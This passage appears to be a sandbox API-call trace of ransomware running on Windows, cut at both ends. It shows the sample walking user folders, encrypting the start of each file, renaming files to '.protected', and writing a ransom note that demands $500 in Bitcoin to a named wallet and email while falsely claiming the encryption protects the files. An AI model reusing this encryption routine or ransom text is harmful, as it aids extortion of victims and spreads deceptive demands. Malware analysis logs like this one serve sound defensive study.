(in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*") returned 68 [0077.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0077.504] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.504] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.504] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.504] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.504] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.504] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\.") returned 68 [0077.504] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.505] 
FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.505] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.505] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.505] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.505] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.505] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.505] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\..") returned 69 [0077.505] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.505] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.505] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.505] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="Windows") returned -1 [0077.505] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="Program Files") returned -1 [0077.505] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="Program Files (x86)") returned -1 [0077.505] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="$Recycle.bin") returned 1 [0077.505] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="System Volume Information") returned -1 [0077.505] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned 85 [0077.505] StrStrIW (lpFirst="AdobeCMapFnt10.lst", lpSrch=".protected") returned 0x0 [0077.505] lstrcmpW (lpString1="AdobeCMapFnt10.lst", lpString2="RESTORE_FILES.txt") returned -1 [0077.505] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.505] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned 85 [0077.506] StrStrW (lpFirst="AdobeCMapFnt10.lst", lpSrch=".txt") returned 0x0 [0077.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned 85 [0077.506] StrStrW (lpFirst="AdobeCMapFnt10.lst", lpSrch=".rar") returned 0x0 [0077.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned 85 [0077.506] StrStrW (lpFirst="AdobeCMapFnt10.lst", lpSrch=".zip") returned 0x0 [0077.506] ReadFile (in: hFile=0x150, lpBuffer=0x4a0460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.512] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.512] WriteFile (in: hFile=0x150, lpBuffer=0x4a0460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.512] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.512] WriteFile (in: 
hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0077.519] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0077.519] CloseHandle (hObject=0x150) returned 1 [0077.519] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.protected") returned 95 [0077.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.protected")) returned 1 [0077.520] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.520] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="Windows") returned -1 [0077.520] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="Program Files") returned -1 [0077.520] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="Program Files (x86)") returned -1 [0077.520] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="$Recycle.bin") returned 1 [0077.520] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="System Volume Information") returned -1 [0077.520] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst") returned 84 
[0077.520] StrStrIW (lpFirst="AdobeSysFnt10.lst", lpSrch=".protected") returned 0x0 [0077.520] lstrcmpW (lpString1="AdobeSysFnt10.lst", lpString2="RESTORE_FILES.txt") returned -1 [0077.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst") returned 84 [0077.522] StrStrW (lpFirst="AdobeSysFnt10.lst", lpSrch=".txt") returned 0x0 [0077.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst") returned 84 [0077.522] StrStrW (lpFirst="AdobeSysFnt10.lst", lpSrch=".rar") returned 0x0 [0077.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst") returned 84 [0077.522] StrStrW (lpFirst="AdobeSysFnt10.lst", lpSrch=".zip") returned 0x0 [0077.522] ReadFile (in: hFile=0x150, lpBuffer=0x4a0460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.558] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.558] WriteFile (in: hFile=0x150, 
lpBuffer=0x4a0460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.558] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.558] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0077.581] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0077.581] CloseHandle (hObject=0x150) returned 1 [0077.593] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.protected") returned 94 [0077.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst.protected")) returned 1 [0077.668] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.668] lstrcmpiW (lpString1="Cache", lpString2="Windows") returned -1 [0077.668] lstrcmpiW (lpString1="Cache", lpString2="Program Files") returned -1 [0077.668] lstrcmpiW (lpString1="Cache", lpString2="Program Files (x86)") returned -1 [0077.668] lstrcmpiW (lpString1="Cache", lpString2="$Recycle.bin") 
returned 1 [0077.668] lstrcmpiW (lpString1="Cache", lpString2="System Volume Information") returned -1 [0077.668] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache") returned 72 [0077.668] lstrcmpW (lpString1="Cache", lpString2=".") returned 1 [0077.668] lstrcmpW (lpString1="Cache", lpString2="..") returned 1 [0077.668] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*") returned 74 [0077.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0077.668] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.668] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.668] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.668] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.668] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.668] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\.") returned 74 [0077.668] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.668] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0077.669] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.669] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.669] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.669] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.669] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.669] 
wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\..") returned 75 [0077.669] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.669] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.669] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0077.669] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="Windows") returned -1 [0077.669] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="Program Files") returned -1 [0077.669] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="Program Files (x86)") returned -1 [0077.669] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="$Recycle.bin") returned 1 [0077.669] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="System Volume Information") returned -1 [0077.669] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst") returned 86 [0077.669] StrStrIW (lpFirst="AcroFnt10.lst", lpSrch=".protected") returned 0x0 [0077.669] lstrcmpW (lpString1="AcroFnt10.lst", lpString2="RESTORE_FILES.txt") returned -1 [0077.669] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0077.669] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0077.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0077.721] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst") returned 86 [0077.721] StrStrW (lpFirst="AcroFnt10.lst", lpSrch=".txt") returned 0x0 [0077.721] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst") returned 86 [0077.721] StrStrW (lpFirst="AcroFnt10.lst", lpSrch=".rar") returned 0x0 [0077.721] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst") returned 86 [0077.721] StrStrW (lpFirst="AcroFnt10.lst", lpSrch=".zip") returned 0x0 [0077.722] ReadFile (in: hFile=0x154, lpBuffer=0x4a1468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1468*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0077.762] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.762] WriteFile (in: hFile=0x154, lpBuffer=0x4a1468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1468*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0077.762] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.762] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0077.764] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0077.764] CloseHandle (hObject=0x154) returned 1 [0077.764] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.protected") returned 96 [0077.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst.protected")) returned 1 [0077.765] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0077.765] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0077.765] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\RESTORE_FILES.txt") returned 90 [0077.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.765] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.765] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0077.766] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.766] WriteFile (in: hFile=0x150, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0077.766] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.766] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0077.766] CloseHandle (hObject=0x150) returned 1 [0077.767] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.767] lstrcmpiW (lpString1="SharedDataEvents", lpString2="Windows") returned -1 [0077.767] lstrcmpiW (lpString1="SharedDataEvents", lpString2="Program Files") returned 1 [0077.767] lstrcmpiW (lpString1="SharedDataEvents", lpString2="Program Files (x86)") returned 1 [0077.767] lstrcmpiW (lpString1="SharedDataEvents", lpString2="$Recycle.bin") returned 1 [0077.767] lstrcmpiW (lpString1="SharedDataEvents", lpString2="System Volume Information") returned -1 [0077.767] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents") returned 83 [0077.767] StrStrIW (lpFirst="SharedDataEvents", lpSrch=".protected") returned 0x0 [0077.767] lstrcmpW (lpString1="SharedDataEvents", lpString2="RESTORE_FILES.txt") returned 1 [0077.767] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.767] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.767] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents") returned 83 [0077.768] StrStrW (lpFirst="SharedDataEvents", lpSrch=".txt") returned 0x0 [0077.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents") returned 83 [0077.768] StrStrW (lpFirst="SharedDataEvents", lpSrch=".rar") returned 0x0 [0077.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents") returned 83 [0077.768] StrStrW (lpFirst="SharedDataEvents", lpSrch=".zip") returned 0x0 [0077.768] ReadFile (in: hFile=0x150, lpBuffer=0x4a0460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesRead=0x295e7b4*=0x1400, lpOverlapped=0x0) returned 1 [0077.792] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.792] WriteFile (in: hFile=0x150, lpBuffer=0x4a0460*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 